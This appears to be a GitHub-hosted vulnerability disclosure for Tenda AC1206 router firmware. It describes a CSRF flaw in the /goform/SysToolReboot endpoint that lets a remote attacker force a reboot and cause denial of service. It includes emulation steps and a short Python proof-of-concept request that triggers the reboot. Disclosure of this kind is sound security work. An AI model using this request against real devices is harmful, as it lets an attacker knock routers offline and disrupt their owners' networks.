Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Affect device: Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01(https://www.tenda.com.cn/download/detail-2766.html)

Vulnerability Type: Cross Site Request Forgery (CSRF)

Impact: Denial of Service(DoS)

Vulnerability description

This vulnerability lies in the /goform/SysToolReboot page which influences the lastest version of Tenda-AC1206 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01 (https://www.tenda.com.cn/download/detail-2766.html)

The vulnerability exists in the file /bin/httpd , function fromSysToolReboot .

1

It allows remote attackers to reboot the device and cause denial of service via a payload hosted by an attacker-controlled web page.

POC and repetition

In order to reproduce the vulnerability, the following steps can be followed:

  1. Boot the firmware by qemu-system or other ways (real machine)
  2. Attack with the following POC attacks
import requests

url = "http://192.168.23.133/goform/SysToolReboot"

r = requests.get(url)

print(r.content)

By sending this poc, we can achieve the effect of a denial-of-service(DOS) attack .

1